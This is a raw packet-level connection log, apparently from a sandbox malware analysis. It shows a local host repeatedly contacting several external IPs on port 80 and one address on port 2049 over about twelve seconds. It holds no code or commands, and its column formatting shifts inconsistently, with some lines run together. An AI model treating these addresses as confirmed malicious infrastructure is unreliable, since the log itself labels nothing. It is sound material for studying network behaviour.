                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.194567919 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.194629908 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.532799006 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.537779093 CET805965318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.537861109 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.538019896 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.538038969 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.543587923 CET805965318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.543610096 CET805965318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.824763060 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.858416080 CET596542049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.863344908 CET204959654212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.863440990 CET596542049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.863703966 CET596542049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.864799023 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.864799023 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.868578911 CET204959654212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.869671106 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.869678020 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.011395931 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.059551001 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.071643114 CET5966080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.076437950 CET805966013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.076497078 CET5966080192.168.2.513.251.16.150
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Nov 5, 2024 17:03:43.076834917 CET  59660        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:43.076880932 CET  59660        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:43.081609964 CET  80           59660      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:43.081685066 CET  80           59660      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:43.356498003 CET  2049         59654      212.162.149.53   192.168.2.5
Nov 5, 2024 17:03:43.356874943 CET  59654        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:43.357126951 CET  59654        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:43.979379892 CET  80           59653      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:43.980443954 CET  59653        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:43.986033916 CET  80           59653      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:43.986095905 CET  59653        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:44.206655979 CET  59666        80         192.168.2.5      18.208.156.248
Nov 5, 2024 17:03:44.211782932 CET  80           59666      18.208.156.248   192.168.2.5
Nov 5, 2024 17:03:44.211925030 CET  59666        80         192.168.2.5      18.208.156.248
Nov 5, 2024 17:03:44.212300062 CET  59666        80         192.168.2.5      18.208.156.248
Nov 5, 2024 17:03:44.212440968 CET  59666        80         192.168.2.5      18.208.156.248
Nov 5, 2024 17:03:44.217578888 CET  80           59666      18.208.156.248   192.168.2.5
Nov 5, 2024 17:03:44.217706919 CET  80           59666      18.208.156.248   192.168.2.5
Nov 5, 2024 17:03:44.502327919 CET  80           59660      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:44.502523899 CET  59660        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:44.508008957 CET  80           59660      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:44.511147976 CET  59660        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:44.547730923 CET  59667        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:44.553338051 CET  80           59667      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:44.553462982 CET  59667        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:44.553659916 CET  59667        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:44.553705931 CET  59667        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:44.558476925 CET  80           59667      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:44.558608055 CET  80           59667      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:44.869647980 CET  80           59666      18.208.156.248   192.168.2.5
Nov 5, 2024 17:03:44.871046066 CET  59666        80         192.168.2.5      18.208.156.248
Nov 5, 2024 17:03:44.876718044 CET  80           59666      18.208.156.248   192.168.2.5
Nov 5, 2024 17:03:44.876774073 CET  59666        80         192.168.2.5      18.208.156.248
Nov 5, 2024 17:03:45.107233047 CET  59673        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:45.112023115 CET  80           59673      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:45.112106085 CET  59673        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:45.112466097 CET  59673        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:45.112466097 CET  59673        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:45.117350101 CET  80           59673      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:45.117362022 CET  80           59673      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:45.208004951 CET  80           59667      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:45.208182096 CET  59667        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:45.213516951 CET  80           59667      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:45.213952065 CET  59667        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:45.248589039 CET  59674        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:45.253449917 CET  80           59674      54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:45.253520012 CET  59674        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:45.253659010 CET  59674        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:45.253686905 CET  59674        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:45.258562088 CET  80           59674      54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:45.258651972 CET  80           59674      54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:45.765846014 CET  80           59673      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:45.766212940 CET  59673        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:45.771400928 CET  80           59673      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:45.771456957 CET  59673        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:45.999880075 CET  59680        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:46.004703999 CET  80           59680      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:46.004770041 CET  59680        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:46.004925966 CET  59680        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:46.004947901 CET  59680        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:46.009810925 CET  80           59680      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:46.009908915 CET  80           59680      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:46.098514080 CET  80           59674      54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:46.098937035 CET  59674        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:46.104373932 CET  80           59674      54.244.188.177   192.168.2.5
Nov 5, 2024 17:03:46.105082989 CET  59674        80         192.168.2.5      54.244.188.177
Nov 5, 2024 17:03:46.132705927 CET  59681        80         192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:46.137644053 CET  80           59681      35.164.78.200    192.168.2.5
Nov 5, 2024 17:03:46.141182899 CET  59681        80         192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:46.141329050 CET  59681        80         192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:46.141366959 CET  59681        80         192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:46.146177053 CET  80           59681      35.164.78.200    192.168.2.5
Nov 5, 2024 17:03:46.146189928 CET  80           59681      35.164.78.200    192.168.2.5
Nov 5, 2024 17:03:46.959660053 CET  80           59681      35.164.78.200    192.168.2.5
Nov 5, 2024 17:03:46.959924936 CET  59681        80         192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:46.965477943 CET  80           59681      35.164.78.200    192.168.2.5
Nov 5, 2024 17:03:46.965565920 CET  59681        80         192.168.2.5      35.164.78.200
Nov 5, 2024 17:03:47.005260944 CET  59687        80         192.168.2.5      3.94.10.34
Nov 5, 2024 17:03:47.010364056 CET  80           59687      3.94.10.34       192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010446072 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010684013 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010766983 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.016083002 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.016093969 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.453851938 CET805968018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.454044104 CET5968080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.459480047 CET805968018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.459544897 CET5968080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.691274881 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.691459894 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.691715956 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.697954893 CET805969118.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698049068 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698206902 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698240042 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.722784042 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.722842932 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.724448919 CET805969118.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.724459887 CET805969118.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.749089956 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.754157066 CET8059693165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.754287004 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.760854006 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.760989904 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.765888929 CET8059693165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.766243935 CET8059693165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.374037027 CET596952049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.378927946 CET204959695212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.379019022 CET596952049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.379300117 CET596952049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.384139061 CET204959695212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.549619913 CET805969118.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.549808025 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.555088043 CET805969118.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.557146072 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.567636013 CET8059693165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.622165918 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.626569033 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.626955986 CET5969880192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.631865025 CET8059693165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.632129908 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.632359028 CET8059698165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.632422924 CET5969880192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.632597923 CET5969880192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.632626057 CET5969880192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.638011932 CET8059698165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.638024092 CET8059698165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.866322041 CET204959695212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.866396904 CET596952049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.866678953 CET596952049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.902498960 CET5970180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.908143044 CET805970118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.908206940 CET5970180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.908615112 CET5970180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.908642054 CET5970180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.913537979 CET805970118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.913558006 CET805970118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.436620951 CET8059698165.160.13.20192.168.2.5
Timestamp                          | Source Port | Dest Port | Source IP      | Dest IP
Nov 5, 2024 17:03:49.481443882 CET | 59698       | 80        | 192.168.2.5    | 165.160.13.20
Nov 5, 2024 17:03:49.495486021 CET | 59705       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:49.500313044 CET | 80          | 59705     | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:03:49.503083944 CET | 59705       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:49.503246069 CET | 59705       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:49.503273964 CET | 59705       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:49.508517981 CET | 80          | 59705     | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:03:49.508532047 CET | 80          | 59705     | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:03:49.581597090 CET | 80          | 59701     | 18.208.156.248 | 192.168.2.5
Nov 5, 2024 17:03:49.581782103 CET | 59701       | 80        | 192.168.2.5    | 18.208.156.248
Nov 5, 2024 17:03:49.587105989 CET | 80          | 59701     | 18.208.156.248 | 192.168.2.5
Nov 5, 2024 17:03:49.587172985 CET | 59701       | 80        | 192.168.2.5    | 18.208.156.248
Nov 5, 2024 17:03:49.836086988 CET | 59708       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:49.841125965 CET | 80          | 59708     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:49.841190100 CET | 59708       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:49.841599941 CET | 59708       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:49.841625929 CET | 59708       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:49.848371029 CET | 80          | 59708     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:49.848736048 CET | 80          | 59708     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:50.342863083 CET | 80          | 59705     | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:03:50.348978043 CET | 59705       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:50.354336023 CET | 80          | 59705     | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:03:50.354403973 CET | 59705       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:50.493592024 CET | 59652       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:50.493916035 CET | 59713       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:50.498717070 CET | 80          | 59713     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:50.498807907 CET | 59713       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:50.498843908 CET | 80          | 59652     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:50.499032021 CET | 59713       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:50.499063015 CET | 59652       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:50.499141932 CET | 59713       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:50.503914118 CET | 80          | 59713     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:50.504250050 CET | 80          | 59713     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:51.137124062 CET | 80          | 59713     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:51.184587002 CET | 59713       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:51.279618025 CET | 80          | 59708     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:51.325179100 CET | 59708       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:51.413696051 CET | 59708       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:51.419847965 CET | 80          | 59708     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:51.419945002 CET | 59708       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:51.543286085 CET | 59713       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:51.543625116 CET | 59719       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:51.549524069 CET | 80          | 59713     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:51.549623013 CET | 59713       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:51.549845934 CET | 80          | 59719     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:51.549925089 CET | 59719       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:51.550123930 CET | 59719       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:51.550165892 CET | 59719       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:51.556006908 CET | 80          | 59719     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:51.556168079 CET | 80          | 59719     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:51.759819984 CET | 59721       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:51.765013933 CET | 80          | 59721     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:51.765126944 CET | 59721       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:51.765412092 CET | 59721       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:51.765472889 CET | 59721       | 80        | 192.168.2.5    | 13.251.16.150
Nov 5, 2024 17:03:51.770378113 CET | 80          | 59721     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:51.770695925 CET | 80          | 59721     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:52.178833008 CET | 80          | 59719     | 208.100.26.245 | 192.168.2.5
Nov 5, 2024 17:03:52.231434107 CET | 59719       | 80        | 192.168.2.5    | 208.100.26.245
Nov 5, 2024 17:03:52.252660990 CET | 59724       | 80        | 192.168.2.5    | 34.211.97.45
Nov 5, 2024 17:03:52.259027004 CET | 80          | 59724     | 34.211.97.45   | 192.168.2.5
Nov 5, 2024 17:03:52.259898901 CET | 59724       | 80        | 192.168.2.5    | 34.211.97.45
Nov 5, 2024 17:03:52.260205984 CET | 59724       | 80        | 192.168.2.5    | 34.211.97.45
Nov 5, 2024 17:03:52.260205984 CET | 59724       | 80        | 192.168.2.5    | 34.211.97.45
Nov 5, 2024 17:03:52.266077042 CET | 80          | 59724     | 34.211.97.45   | 192.168.2.5
Nov 5, 2024 17:03:52.266089916 CET | 80          | 59724     | 34.211.97.45   | 192.168.2.5
Nov 5, 2024 17:03:53.097253084 CET | 80          | 59724     | 34.211.97.45   | 192.168.2.5
Nov 5, 2024 17:03:53.097486019 CET | 59724       | 80        | 192.168.2.5    | 34.211.97.45
Nov 5, 2024 17:03:53.102955103 CET | 80          | 59724     | 34.211.97.45   | 192.168.2.5
Nov 5, 2024 17:03:53.103024960 CET | 59724       | 80        | 192.168.2.5    | 34.211.97.45
Nov 5, 2024 17:03:53.143501043 CET | 59729       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:53.149420023 CET | 80          | 59729     | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:03:53.153105974 CET | 59729       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:53.153350115 CET | 59729       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:53.153378963 CET | 59729       | 80        | 192.168.2.5    | 54.244.188.177
Nov 5, 2024 17:03:53.158135891 CET | 80          | 59729     | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:03:53.158339024 CET | 80          | 59729     | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:03:53.183126926 CET | 80          | 59721     | 13.251.16.150  | 192.168.2.5
Nov 5, 2024 17:03:53.183303118 CET | 59721       | 80        | 192.168.2.5    | 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.188396931 CET805972113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.188461065 CET5972180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.421205997 CET5973280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.426150084 CET805973234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.426249981 CET5973280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.426381111 CET5973280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.426398039 CET5973280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.431284904 CET805973234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.431296110 CET805973234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.907176971 CET597362049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.912038088 CET204959736212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.913414955 CET597362049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.913676977 CET597362049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.918855906 CET204959736212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.013762951 CET805972954.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.059531927 CET5972980192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.072267056 CET5972980192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.077605963 CET805972954.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.079529047 CET5972980192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.165868044 CET5973780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.171032906 CET805973718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.171245098 CET5973780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.178164959 CET5973780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.178214073 CET5973780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.183010101 CET805973718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.183139086 CET805973718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.263894081 CET805973234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.264117956 CET5973280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.269695044 CET805973234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.272239923 CET5973280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.398756027 CET204959736212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.401093960 CET597362049192.168.2.5212.162.149.53
